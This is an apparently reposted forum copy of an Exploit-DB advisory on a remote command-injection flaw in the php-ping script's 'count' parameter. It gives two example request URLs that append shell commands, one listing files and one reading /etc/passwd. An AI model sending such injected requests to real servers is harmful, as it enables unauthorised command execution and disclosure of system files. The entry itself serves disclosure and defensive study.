Exploit PHP-ping - 'Count' Command Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
23487
Проверка EDB
  1. Пройдено
Автор
PPP-DESIGN
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2003-12-29
Код:
source: https://www.securityfocus.com/bid/9309/info

It has been reported that php-ping may be prone to a remote command execution vulnerability that may allow remote attackers to execute commands on vulnerable systems. The problem exists due to insufficient sanitization of shell
metacharacters via the 'count' parameter of php-ping.php script.

Exploitation would permit a remote attacker to execute arbitrary commands with the privileges of the web server hosting the vulnerable software. 

http://www.example.com/php-ping.php?count=1+%26+ls%20-l+%26&submit=Ping%21
http://www.example.com/php-ping.php?count=1+%26+cat%20/etc/passwd+%26&submit=Ping%21
 
Источник
www.exploit-db.com

Похожие темы